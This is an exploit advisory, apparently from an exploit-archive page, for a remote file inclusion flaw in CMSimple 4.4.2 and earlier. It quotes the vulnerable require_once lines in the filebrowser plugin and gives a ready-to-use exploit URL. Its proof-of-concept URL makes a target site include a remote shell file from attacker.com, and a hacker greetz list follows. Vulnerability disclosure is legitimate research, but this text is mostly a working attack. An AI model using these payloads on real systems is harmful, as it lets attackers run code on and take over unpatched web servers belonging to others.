扫码分享
验证:
体验盒子
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 | ============================================================================================================= [o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability Software : CMSimple - Open Source CMS with no database Version: 4.4, 4.4.2 and below Vendor : http://www.cmsimple.org Author : NoGe Contact: noge[dot]code[at]gmail[dot]com Blog : http://evilc0de.blogspot.com Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database. All data are stored in a simple file system. ============================================================================================================= [o] Vulnerable File plugins/filebrowser/classes/required_classes.php require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php'; require_once $pth['folder']['plugin'] . 'classes/filebrowser.php'; ============================================================================================================= [o] Exploit http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI] ============================================================================================================= [o] PoC http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt? ============================================================================================================= [o] Greetz Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory aJe kaka11 matthews wishnusakti inc0mp13te martfella pizzyroot Genex H312Y noname tukulesto }^-^{ ============================================================================================================= [o] April 17 2014 - Papua, Indonesia - Met Paskah! Tuhan berkati.. :) |
体验盒子
